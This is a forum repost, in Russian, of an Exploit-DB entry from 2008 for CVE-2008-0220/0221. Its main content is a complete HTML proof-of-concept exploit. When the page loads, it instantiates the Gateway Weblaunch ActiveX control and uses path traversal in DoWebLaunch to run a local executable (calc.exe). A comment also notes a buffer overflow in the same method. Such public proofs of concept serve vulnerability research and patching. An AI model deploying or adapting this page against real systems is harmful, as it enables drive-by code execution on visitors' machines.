Exploit Gateway Weblaunch - ActiveX Control Insecure Method

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4869
Проверка EDB
  1. Пройдено
Автор
ELAZAR
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2008-0221 cve-2008-0220
Дата публикации
2008-01-08
HTML:
<!-- 
Gateway Weblaunch ActiveX Control Insecure Method Exploit
Implemented Categories:
Category: Safe for Initialising
Category: Safe for Scripting
Written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, weblaunch.ocx version 1.0.0.1
This method is also vulnerable to a buffer overflow in the 2nd and 4th parameters
-->
<html>
 <head>
  <title>Gateway Weblaunch ActiveX Control Insecure Method Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
     
                //escape from systemdrive\documents and settings\username\local settings\temp
		obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\calc.exe","","");
          
    } 
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:93CEA8A4-6059-4E0B-ADDD-73848153DD5E" height="0" width="0">
     Unable to create object
    </object>
 </body>
</html>

# milw0rm.com [2008-01-08]
 
Источник
www.exploit-db.com

Похожие темы